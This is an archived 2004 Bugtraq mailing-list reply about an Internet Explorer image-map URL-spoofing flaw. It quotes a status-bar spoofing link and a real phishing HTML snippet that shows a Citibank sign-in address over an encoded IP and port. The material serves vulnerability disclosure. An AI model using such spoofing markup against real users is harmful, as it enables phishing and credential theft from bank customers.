RE: Microsoft Internet Explorer ImageMap URL Spoof Vulnerability

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: Microsoft Internet Explorer ImageMap URL Spoof Vulnerability
From: "James C Slora Jr" <Jim.Slora@xxxxxxxx>
Date: Thu, 3 Jun 2004 09:54:09 -0400
In-reply-to: <200405271932.i4RJW9T0008840@xxxxxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcREtArY+kK7Mbk1Q/eLlOz+jhxtRwEvVKYg

> <a onmouseover="window.status='http://www.the-url-you-
> see.com;return true" 
> title="The Link"
> onmouseout="window.status='Whatever-you-like-here';return true"
> href='http://www.some-other-url.com'>The link</a>
> 
> 
>  -->
> 
> the point of the exercise is that default settings for the 
> most popular MUA's out there today have scripting disabled.

True. This works better. From the wild.

A
HREF="https://web.da-us.citibank.com/signin/scripts/Iogin2/user_setup.jsp";><
map name="FPMap0"><area coords="0, 0, 610, 275" shape="rect"
href="http://%32%31%37%2E%33%37%2E%32%31%31%2E%32%35%30:%34%39%30%33/%63%69%
74/%69%6E%64%65%78%2E%68%74%6D"></map><img
SRC="cid:part1.07010704.01060800@user-billing47@citibank.com" border="0"
usemap="#FPMap0"</A>

The cid reference points to an embedded GIF that looks like hyperlinked text
https://web.da-us.citibank.com/signin/scripts/Iogin2/user_setup.jsp

References:
- Re: Microsoft Internet Explorer ImageMap URL Spoof Vulnerability
  - From: http-equiv@xxxxxxxxxx

Prev by Date: Re: Netgear WG602 Accesspoint vulnerability
Next by Date: [openwebmail] Fw: Re: XSS bug.
Previous by thread: Re: Microsoft Internet Explorer ImageMap URL Spoof Vulnerability
Next by thread: oscommerce 2.2 file_manager.php file browsing
Index(es):
- Date
- Thread